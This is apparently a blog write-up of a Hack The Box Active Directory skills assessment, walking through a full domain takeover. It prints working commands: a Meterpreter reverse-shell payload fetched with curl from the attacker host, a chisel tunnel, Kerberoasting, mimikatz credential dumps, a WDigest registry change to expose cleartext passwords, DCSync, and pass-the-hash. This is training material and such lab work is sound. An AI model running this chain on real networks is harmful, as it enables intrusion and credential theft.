cybersec · htb

AD Enumeration & Attacks Skills Assessment Part I

Feb 11, 2025 ~10 min read

Initial Access

Reconnaissance

Given the scenario, we get the user admin and the password My_W3bsH3ll_*********, so we login with the credentials:

Login

Question 1 — Submit the contents of the flag.txt file on the administrator Desktop of the web server

We can access the contents of the Administrator Desktop, so I just grabbed the flag:

cmd 
type C:\Users\Administrator\Desktop\flag.txt
Flag 1

Reverse Shell Using Metasploit

Payload Generation

bash 
msfvenom -p windows/x64/meterpreter/reverse_https lhost=<attacker_ip> -f exe -o payload.exe lport=4444
Payload Generation

Metasploit Listener Configuration

bash 
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 10.10.15.161
set LPORT 4444
Listener Config

Payload Delivery and Execution

bash 
python3 -m http.server

Using curl to download and execute the payload:

bash 
curl 10.10.15.161:8000/payload.exe -o payload.exe
./payload.exe
Payload Delivery

Got the shell.

Shell

Question 2 — Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name

Enumerating SPNs with setspn.exe:

cmd 
setspn.exe -Q */*
SPN Enumeration

Got the answer: s*****l

Question 3 — Crack the account's password. Submit the cleartext value.

To get the password we can use PowerView. Serve it with a Python HTTP server, download with curl, then import:

powershell 
Import-Module .\PowerView.ps1
PowerView Import

Get the SPN ticket:

powershell 
Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat
SPN Ticket

Got the hash. Crack it with Hashcat, which gives us the password lu***7:

bash 
hashcat -m 13100 svc_sql_hash /usr/share/wordlists/rockyou.txt

Question 4 — Submit the contents of the flag.txt file on the Administrator desktop on MS01

Before we proceed, get the IP of MS01 by pinging it — reveals 172.16.6.**.

MS01 IP

Login to MS01 with the credentials we found:

powershell 
$password = ConvertTo-SecureString "<password>" -AsPlainText -Force
$cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\svc_sql", $password)
Enter-PSSession -ComputerName MS01-INLANEFREIGHT.LOCAL -Credential $cred
PSSession

It worked, but grabbing the flag directly didn't. Needed a proper shell — tried Metasploit SOCKS proxy but it wasn't working, so I used chisel.exe instead.

Tip: change/add the proxychains config to use socks5

On attack machine (Linux):

bash 
chisel server -p 9088 --reverse

On target machine (Windows):

cmd 
./chisel.exe client 'Attack-IP:9088' R:socks
Chisel Tunnel

Now using impacket-psexec to get the flag:

bash 
proxychains impacket-psexec INLANEFREIGHT.LOCAL/<user>:<password>@<Target>
PSExec Flag

Question 5 — Find cleartext credentials for another domain user. Submit the username.

Ran an nmap scan and found RDP open, so I logged in using xfreerdp with a shared directory containing all the tools we may need:

bash 
proxychains xfreerdp /v:'172.16.6.**:3389' /u:"inlanefreight\<user>" /p:'<password>' /drive:Shared,/opt/test
RDP Login

Ran Inveigh first but found nothing.

Inveigh

Went with mimikatz:

cmd 
privilege::debug
sekurlsa::logonpasswords
Mimikatz Output

Got user t***** on domain DC01 — that's the answer.

Question 6 — Submit this user's cleartext password.

The password showed as none in the previous dump. To get it we need to force WDigest to store credentials in plaintext via a registry modification, then reboot:

cmd 
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
WDigest Registry

After restarting, we get the cleartext password:

Cleartext Password

Question 7 — What attack can this user perform?

Guessed DCSync and it was correct. To confirm why, we use PowerView to check the user's ACL permissions on the domain:

powershell 
Import-Module .\PowerView.ps1
Get-DomainUser -Identity <user> | select samaccountname,objectsid,memberof,useraccountcontrol | fl
$sid = "S-1-..."
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl
ACL Check

DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, and DS-Replication-Get-Changes-In-Filtered-Set are all present — this allows the user to pull replication data from the AD database, enabling a DCSync attack.

Question 8 — Take over the domain and submit the flag on the Administrator Desktop on DC01

Use Runas to operate as t*****, then dump Administrator hashes via impacket-secretsdump (get DC01 IP by pinging it first):

bash 
proxychains impacket-secretsdump -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/<user>@<ip>

With the hash, pass it using crackmapexec to get the final flag:

bash 
proxychains crackmapexec smb <ip> -u Administrator -H <hash> -x 'type C:\Users\Administrator\Desktop\flag.txt'